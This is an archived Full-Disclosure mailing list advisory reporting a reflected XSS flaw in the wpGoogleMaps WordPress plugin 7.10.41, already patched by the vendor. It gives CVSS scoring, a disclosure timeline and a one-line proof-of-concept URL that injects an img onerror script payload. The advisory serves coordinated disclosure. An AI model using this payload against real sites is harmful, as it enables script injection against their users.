lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Tue, 5 Feb 2019 16:29:38 +0100
From: Tim Coen <tc.coen@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] wpGoogleMaps 7.10.41 - Reflected XSS (WordPress Plugin)

  * Vulnerability: XSS
  * Affected Software:
[wpGoogleMaps](https://wordpress.org/plugins/wp-google-maps/)
  * Affected Version: 7.10.41
  * Patched Version: 7.10.43
  * CVE: not requested
  * Risk: Medium
  * Vendor Contacted: 10/25/2018
  * Vendor Fix: 10/31/2018
  * Public Disclosure: 02/05/2019
  * Credit: Tim Coen

##### CVSS

6.1 Medium
[CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

##### Overview

The wpGoogleMaps WordPress plugin is vulnerable to reflected XSS as it
echoes PHP_SELF without proper encoding.

##### Proof of Concept

    http://192.168.0.103/wordpress/wp-admin/admin.php/'"><img src=x
onerror=alert(1)>?page=wp-google-maps-menu&action=foo

##### Timeline

- 10/25/2018 Sent advisory
- 10/25/2018 Vendor confirms and releases fix
- 10/25/2018 Suggested improvement for fix
- 10/31/2018 Vendor releases improved fix
- 02/05/2019 Disclosure

##### Details & Full Advisory URL

https://security-consulting.icu/blog/2019/02/wordpress-wpgooglemaps-xss/

-- 
PGP Key: https://pgp.mit.edu/pks/lookup?op=get&search=0x204DCBDD29BA0D89

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists